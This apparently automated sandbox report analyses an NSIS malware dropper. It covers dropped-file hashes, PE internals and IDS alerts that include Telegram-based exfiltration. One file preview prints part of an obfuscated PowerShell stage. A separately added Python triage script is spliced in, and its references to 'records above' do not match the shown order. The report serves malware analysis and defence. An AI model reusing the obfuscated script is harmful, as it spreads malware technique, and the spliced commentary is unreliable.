                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........0.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<.soP..R).$WgC4F..J.U.a.c\..J.c]7..u..L.\w)...{..J..`....WH..........)..jy...#.=j.7.S....hs".+....WO.....MsQ.....~......}...p..._....k..)...x.....ZV..)...ft@.o...........5.......k..........N1....uO.]~.1.t=T....>".....7....H.....Z.....J..|.......f.<.?5_...f.......Q.uL1..?.uz!.......A\....oX..+.D9.d....*...>"...n.....*...$.g..b.j.b.....9q.....1X..=Ni.z
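The records above give each dropped file the same handful of metrics (size, 8-bit entropy, MD5/SHA-1/SHA-256, a type guessed from magic bytes, and the raw content of the Zone.Identifier stream). The script below re-derives those metrics offline and applies the checks an analyst would run over a dropped-files directory: flag multi-megabyte files whose entropy is near zero (padding, as in the two "data" files above), flag high-entropy executables (the packed NSIS installer dropped by powershell.exe), detect a dropped file that is byte-identical to the submitted sample, and read the ZoneId out of a Zone.Identifier stream (ZoneId=0 is the Local Machine zone, so the written file carries no Internet mark-of-the-web and SmartScreen will not prompt for it). This is an added example, not part of the Joe Sandbox report; every input is constructed in `constructed_samples()`, the entropy and size thresholds are assumptions, and the NSIS check is a substring heuristic rather than a parser of the installer format.

```python
"""Re-derive sandbox dropped-file metrics and run triage checks over them.
Added example with constructed inputs; thresholds are assumptions."""
import hashlib
import math
import struct
from collections import Counter
from typing import Dict, List, Optional

# URL security zones as used in the Zone.Identifier ADS (ZoneId=3 is the Internet MOTW)
ZONES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
         3: "Internet", 4: "Restricted Sites"}
_TEXT = bytes(range(32, 127)) + b"\t\n\r"   # bytes libmagic treats as plain ASCII text


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the report's "Entropy (8bit)"."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> Dict[str, str]:
    """Upper-case hex digests in the same algorithms the report lists."""
    return {a: hashlib.new(a, data).hexdigest().upper() for a in ("md5", "sha1", "sha256")}


def file_type(data: bytes) -> str:
    """Coarse type from magic bytes, mirroring the report's File Type field."""
    if not data:
        return "empty"
    if data[:4] == b"\xff\xd8\xff\xe0" and data[6:10] == b"JFIF":
        return "JPEG image data, JFIF"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00" and e_lfanew + 26 <= len(data):
            magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]   # optional header magic
            kind = {0x10B: "PE32 executable", 0x20B: "PE32+ executable"}.get(magic, "PE executable")
            # "NullsoftInst" is the NSIS first-header magic; a substring hit is a heuristic
            if b"NullsoftInst" in data:
                kind += ", Nullsoft Installer self-extracting archive"
            return kind
    if not data.translate(None, _TEXT):                  # every byte printable or CR/LF/TAB
        return "ASCII text" + (", with CRLF line terminators" if b"\r\n" in data else "")
    return "data"


def parse_zone_identifier(data: bytes) -> Optional[int]:
    """Return the ZoneId of a Zone.Identifier stream, or None if this is not one."""
    if b"[ZoneTransfer]" not in data:
        return None
    lines = [ln.strip() for ln in data.decode("ascii", errors="replace").splitlines()]
    if "[ZoneTransfer]" not in lines:
        return None
    for ln in lines:
        if ln.startswith("ZoneId="):
            return int(ln.split("=", 1)[1])
    return None


def triage(name: str, data: bytes, sample_sha256: str) -> List[str]:
    """Flags worth raising on one dropped file (assumed thresholds: 1 MiB, 1.0 and 7.5 bits)."""
    flags: List[str] = []
    ent, kind = shannon_entropy_8bit(data), file_type(data)
    if len(data) > 1_000_000 and ent < 1.0:
        flags.append("large-low-entropy")          # bulk padding to defeat size-limited scanners
    if ent > 7.5 and not kind.startswith("JPEG"):
        flags.append("high-entropy")               # packed or encrypted; JPEG is expected to be high
    if digests(data)["sha256"] == sample_sha256.upper():
        flags.append("self-copy-of-sample")        # the stage re-dropped the original executable
    zone = parse_zone_identifier(data)
    if zone is not None and zone < 3:
        flags.append(f"zone-id-{zone}")            # no Internet MOTW on the file this ADS belongs to
    return flags


def constructed_samples() -> Dict[str, bytes]:
    """Deterministic stand-ins for the kinds of files listed in the report (constructed, not real)."""
    blob, h = b"", b"seed"
    while len(blob) < 16384:                       # SHA-256 chaining gives a repeatable high-entropy stream
        h = hashlib.sha256(h).digest()
        blob += h
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + blob
    bloat = b"\x00" * 2_000_000 + b"*" * 40 + b"\x00" * 1_000
    pe = bytearray(0x40)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)         # e_lfanew: PE header right after the DOS header
    pe += b"PE\x00\x00" + bytes(20)                # signature + zeroed COFF header
    pe += struct.pack("<H", 0x10B) + bytes(222)    # optional header: PE32 magic, rest zero
    pe += b"NullsoftInst" + blob
    ads = b"[ZoneTransfer]\r\nZoneId=0\r\n"
    return {"decoy.jpg": jpeg, "bloat.bin": bloat, "stage.exe": bytes(pe),
            "stage.exe:Zone.Identifier": ads}


if __name__ == "__main__":
    samples = constructed_samples()
    sample_hash = digests(samples["stage.exe"])["sha256"]   # pretend stage.exe is the submitted sample
    for name, data in samples.items():
        print(f"{name}: {len(data)} bytes, {file_type(data)}, entropy {shannon_entropy_8bit(data):.4f}, "
              f"flags {triage(name, data, sample_hash)}")
```

On a real case, replace `constructed_samples()` with `path.read_bytes()` over the sandbox's dropped-files export and pass the submitted sample's SHA-256 as `sample_sha256`; the ADS content is what Windows stores in `file:Zone.Identifier`, so on a live host read that stream rather than the file itself. A full type identification would use libmagic, which the `file_type` heuristic here only approximates.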
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 569x676, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):66534
                                                                                                                                                    Entropy (8bit):7.963009588542882
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:v769k7fHg9JJz9Qw30HPeB8i123APVoSthJCx0fjVKhtsf+w62:IkbHSv+3vUDSSDJND+w62
                                                                                                                                                    MD5:F5711710261C0FB12DCA7CA15D9AD619
                                                                                                                                                    SHA1:8FA9011C8928BD4E2C129555FCEE5BC0E2447813
                                                                                                                                                    SHA-256:EB7ADBCC59113FA1D0DC08FF84AE930561F9433F6A0D938B99D83C6544C4D84D
                                                                                                                                                    SHA-512:ED634E895A5E871115C8C887B843C425B2D260F43CD61518C8D12EFC33321E7C7F2340415F7EF8154877A98754C541539253376616E93837AA7FE0122E04D192
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):6956940
                                                                                                                                                    Entropy (8bit):0.15824996919408987
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:Q72H0/f/NEjMkBPvKVTgfhzfniFbsxgICqJ+vWk5XZk2kBVKtPu5j1RR5e5kOqwR:AA451Cr3vpxFxYPX
                                                                                                                                                    MD5:AC7CCC8A1C064ADD6329C0CC4BFAA83B
                                                                                                                                                    SHA1:19D96A96EAEF0CF2EDCEFE4A54F951025E28166C
                                                                                                                                                    SHA-256:B2A5A9667276510EA8008E5B90A9539058D329FCF76D969B0A2056B6E604B0B6
                                                                                                                                                    SHA-512:CFD12AC04657884EB75DF562DFCB3A372522200573C57489A53BF8C19110E4C1D070B13059CF86BA77757319ACA0B510CA79D273588651DDE5DD4A9134E7F6A5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 615x599, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):61331
                                                                                                                                                    Entropy (8bit):7.975327377427721
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:qkTTO8yLkLulAcfg6QTY+QjRsmjoKZqR+GjAqR9NgIto9:DHO8yLkLaAyY+W+oMP9qR9NgIu
                                                                                                                                                    MD5:995F3CC5AFDECFCD7C6A17D8FA1B8B04
                                                                                                                                                    SHA1:3A23E71CA73D26137B7D58F4BEAD462A6ED62765
                                                                                                                                                    SHA-256:6E793312F0BE4F73D7A61666C0FF61780AE44D497CE007257F81F5DF96B321F5
                                                                                                                                                    SHA-512:445C74A8F3F9284CB5BB8300580826D96703D35F41A46F09EA434305385BE11D90C0F6729A4704BA7276613F6BB065A17F3998F242FA84FAA0D7940B4D521144
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 644x760, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80483
                                                                                                                                                    Entropy (8bit):7.947457993682135
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:qjf2YT5NAqOYZPjkaKOAlP6pnumIMHU7MHjzezBd9NEfQbM/zlf:vNYZPDnQ6pnuxMU2zeVrGkM/Bf
                                                                                                                                                    MD5:AF05EEA867741C9F3E393B481E2AA0ED
                                                                                                                                                    SHA1:77841CBFAE1252E02E3D8DD24BC4D32B8D0DA001
                                                                                                                                                    SHA-256:2D6991CAF38EFAE38D2849D8BCC3D00AA7AC1DB419AB378DF4823A5516C72CE0
                                                                                                                                                    SHA-512:B1833112351C5163DC42E91929BAF641D0950D2185193D3BA8D0C8FBBA3B3EE068E38C7DD1DE5F8660BC986E560BC397F350F8A623972601E59B2B437AA5CD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3173), with CRLF, LF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):54080
                                                                                                                                                    Entropy (8bit):5.317746130228025
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:wj7u/ytfDkfTspAvZPzBXY/6N/wRysUR0P2e9x:wj7uatbW0A1YCN2UG2eb
                                                                                                                                                    MD5:4281BB34DBC6A97669B1815F61D33612
                                                                                                                                                    SHA1:605F5B8E73077D2814DA07642031CE974B08F2CD
                                                                                                                                                    SHA-256:4903967D23168AE80A460EB825AD870AA4DCDC57932A522999442F4612EF3C20
                                                                                                                                                    SHA-512:9062F880F1D9AF15DA31F40A648677D1BC8D581C19AEBFF91628DCB9DC1C00B461270CF0B37F29FA26522FC75D4CF3E4476FD95D26EE7162A8C9AA44B2C52184
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:$Unmovedly=$smygedes;........$Seglstampe = @'.Tr,vr.skytt$s.rivFPearta igesrOvertvIndkreBl cktBrochoAniman OplaeReforrAcetonTilsteKobbe=Inter$CringCSkrefiprpost nlggrnskepostyrtnTelaup P.imrMarbee DvrgsBarmcsStyneeSuffrrIlloyeOttenidemokrStjs ppap,rlCliniaForskyMidstssomme;Ca.op.OptugfUnderu SvignTill cQuirktPorphiRef soInv lnReval KasteDN,tica CatanVa gbsModulk AffaeAf,adj Det e L rddPredeeDomit Ma e(deu e$nontrCeurasi T.ent VessrKursioNonmonInduspSva hr Inteemimets U edss,unte RobbrTiname Eksp,Vandl$ dsugSSpon iBaj rn DesseLangvc Basuu UmedrSpradiBalannSynovg S ru)Dy el Nonin{Unpro.Bawdi.Untru$ Ev nRB,etoi Signppaho.i .nche LimbnForgliEscha Polis( r caFTridiaRotats Ade hSerraiFor ao Sys nudforaPartlb.impslEveryeA,gio Emaci'Y rurGStd,rl BramiValounRetinsGngge$,edun ExpreGUnscaiBankrr Tehun K,nsC,akroL MyopiAn lofProteeNervirEx eri,ukse O skADau dfBron,fJokesiSkredt elaMProste MerylAtten indicnSuff r Res TTy ogrSensuiIllibc ritieuntrao Mons Tetr PSk eraSlu.mrAdelga,orten S olT arse
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):327781
                                                                                                                                                    Entropy (8bit):7.71140249734367
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:k9JBPh8wvqU3YXcDFwCfSEUnKA6Upky5jN8Tic+etLz3H0/3P:EKw93Y2Fwe1GkyRSTR+6PH0//
                                                                                                                                                    MD5:F195683D18325A42C4304EEB0DC6367A
                                                                                                                                                    SHA1:55A61C425735952BADE435BF3CE82A181BBDF3C8
                                                                                                                                                    SHA-256:B2723EAC8AABE559621C85AB475078BA196DA645D2E5A2618A318DF01B70EBE9
                                                                                                                                                    SHA-512:1BD37D58671FAA0D62B44A85F3DC321CA25315B3D3735D90F1C688EDCDB7921B12E175D277E7EC385E4CEBADAF5E70C2AE7B7D50FBE1C2E670482BD836E5827A
                                                                                                                                                    Malicious:false
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Entropy (8bit):7.856567991289499
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:rAntephialtic.exe
                                                                                                                                                    File size:1'542'704 bytes
                                                                                                                                                    MD5:65249febec3f7bde1c51b92ff5d3c4a7
                                                                                                                                                    SHA1:459c11b637dc859eacea6d65489729f7b32fbf27
                                                                                                                                                    SHA256:f9d051b1d729d3a1689e7b1454902012a5d757f5b5339db346ffcead746802f6
                                                                                                                                                    SHA512:e739a509aa7029116395a436f6b9c07e9e74bae0e81c312e0e0663c315be862a118b18d60c45b72268b47ad09a13ed0c9db54d4f97eba474c154d14d8cbe9a1c
                                                                                                                                                    SSDEEP:24576:nMwM9cEY0ASIJSEwseD6Ph717SM5vw+WDC5InZ/L9GrsXpJzXo1AH9HBevK9Y9Ey:nMwLhcOPhNSM9w+wCyig5JzXo1AtBUK2
                                                                                                                                                    TLSH:47652301229898DBE5F20B30D56AE07571BE7C665B93491F22FA3F2FA5733311A8760D
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....
                                                                                                                                                    Icon Hash:0f2d2d2d4f4e4d37
                                                                                                                                                    Entrypoint:0x40348f
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x5F24D6C5 [Sat Aug 1 02:43:17 2020 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                                                                                                    Signature Valid:false
                                                                                                                                                    Signature Issuer:CN=Inflex, E=Transportbranchers@Subworkman.Aa, O=Inflex, L=West Covina, OU="Eksamensprojekt Teatraliseredes ", S=California, C=US
                                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                    Error Number:-2146762487
                                                                                                                                                    Not Before, Not After
                                                                                                                                                    • 14/09/2024 10:14:58 14/09/2025 10:14:58
                                                                                                                                                    Subject Chain
                                                                                                                                                    • CN=Inflex, E=Transportbranchers@Subworkman.Aa, O=Inflex, L=West Covina, OU="Eksamensprojekt Teatraliseredes ", S=California, C=US
                                                                                                                                                    Version:3
                                                                                                                                                    Thumbprint MD5:61B936835FABE5DDA72B5367E7505600
                                                                                                                                                    Thumbprint SHA-1:1974291448AAAF02DF668A12B21674FD9D83BD5E
                                                                                                                                                    Thumbprint SHA-256:5F8C9E6A1D3D8924DF51951C799B31F84863E63B8791C69192ED0F42A99B5F8B
                                                                                                                                                    Serial:035B3E3C6DCE8D9CA03F8AED298E85C7B8F9069D
Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080CCh]
call dword ptr [004080D0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A22Ch], eax
je 00007F74A05FA553h
push ebx
call 00007F74A05FD841h
cmp eax, ebx
je 00007F74A05FA549h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F74A05FD7BBh
push esi
call dword ptr [00408154h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F74A05FA52Ch
push 0000000Bh
call 00007F74A05FD814h
push 00000009h
call 00007F74A05FD80Dh
push 00000007h
mov dword ptr [0042A224h], eax
call 00007F74A05FD801h
cmp eax, ebx
je 00007F74A05FA551h
push 0000001Eh
call eax
test eax, eax
je 00007F74A05FA549h
or byte ptr [0042A22Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408298h]
mov dword ptr [0042A2F8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216C8h
call dword ptr [0040818Ch]
push 0040A2C8h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e000 | 0x2a330 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1782e8 | 0x748 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6411 | 0x6600 | 1be075c408f39c844a297d85521f5b93 | False | 0.6545266544117647 | data | 6.40243296676441 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | 92925084f722469459e6111e8ee4a9d0 | False | 0.5013020833333334 | data | 4.020801365171916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x23000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4e000 | 0x2a330 | 0x2a400 | 34887897fbeaa2fe2059ab5c9219aca8 | False | 0.3391041050295858 | data | 5.120413177835508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4e448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.23470957056666272
RT_ICON | 0x5ec70 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.37150515030481396
RT_ICON | 0x68118 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4220887245841035
RT_ICON | 0x6d5a0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3892300425129901
RT_ICON | 0x717c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.48941908713692944
RT_ICON | 0x73d70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5687148217636022
RT_ICON | 0x74e18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6127398720682303
RT_ICON | 0x75cc0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6633574007220217
RT_ICON | 0x76568 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.46707317073170734
RT_ICON | 0x76bd0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4595375722543353
RT_ICON | 0x77138 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7340425531914894
RT_ICON | 0x775a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.553763440860215
RT_ICON | 0x77888 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.597972972972973
RT_DIALOG | 0x779b0 | 0x120 | data | English | United States | 0.5104166666666666
RT_DIALOG | 0x77ad0 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x77bf0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x77cb8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x77d18 | 0xbc | data | English | United States | 0.648936170212766
RT_VERSION | 0x77dd8 | 0x214 | data | English | United States | 0.5131578947368421
RT_MANIFEST | 0x77ff0 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Description | Data
Comments | skeletonised unbaling
CompanyName | evalueringsrkkeflgerne dissention revalueringerne
FileVersion | 3.1.0.0
ProductName | stampningernes
Translation | 0x0409 0x04e4

Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-20T20:02:26.278155+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49975 | 142.250.184.238 | 443 | TCP
2025-02-20T20:02:31.147629+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49977 | 132.226.247.73 | 80 | TCP
2025-02-20T20:02:32.600834+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49977 | 132.226.247.73 | 80 | TCP
2025-02-20T20:02:33.190660+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49979 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:34.085155+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49980 | 132.226.247.73 | 80 | TCP
2025-02-20T20:02:37.130720+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49985 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:38.434124+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49987 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:41.150543+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49991 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:43.485069+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.7 | 49994 | 149.154.167.220 | 443 | TCP
2025-02-20T20:02:50.061631+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49995 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                    Feb 20, 2025 20:02:26.977080107 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:26.977624893 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:27.023370028 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.579293013 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.579397917 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.579534054 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.579590082 CET49976443192.168.2.7172.217.16.129
